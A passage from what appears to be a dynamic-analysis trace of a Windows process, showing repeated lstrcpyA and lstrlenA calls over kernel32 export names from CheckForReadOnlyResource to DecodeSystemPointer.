21 [0085.460] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.460] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.460] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.460] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.460] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.460] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.460] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.460] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.460] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.460] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.460] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.460] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.460] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.460] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.460] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.460] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.460] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.460] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.460] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.460] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.460] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.460] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.460] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.460] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.460] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.460] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.460] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.460] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.460] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.460] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.460] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.461] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.461] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.461] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.461] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.461] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.461] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.461] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.461] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.461] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.461] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.461] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.461] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.461] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.461] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.461] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.461] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.461] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.461] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.461] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.461] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.461] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.461] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.461] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.461] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.461] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.461] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.461] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.461] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.461] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.461] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.461] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.461] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.461] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.461] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.461] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.461] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.462] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.462] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.462] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.462] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.462] lstrlenA (lpString="COPYFILEA") returned 9 [0085.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.462] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.462] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.462] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.462] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.462] lstrlenA (lpString="COPYFILEW") returned 9 [0085.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.462] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.462] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.462] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.462] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.462] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.462] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.462] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.462] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.462] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.463] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.463] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.463] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.463] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.463] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.463] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.463] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.463] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.463] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.463] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.463] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.463] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.463] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.463] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.463] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.463] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.463] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.463] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.463] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.464] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.464] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.464] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.464] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.464] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.464] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.464] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.464] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.464] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.464] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.464] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.464] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.464] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.464] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.464] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.464] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.464] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.464] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.465] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.465] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.465] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.465] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.465] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.465] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.465] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.465] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.465] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.465] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.465] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.465] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.465] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.465] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.465] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.465] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.465] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.465] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.466] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.466] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.466] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.466] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.466] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.466] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.466] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.466] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.466] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.466] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.466] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.466] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.466] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.466] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.466] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.466] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.466] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.466] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.467] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.467] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.467] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.467] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") 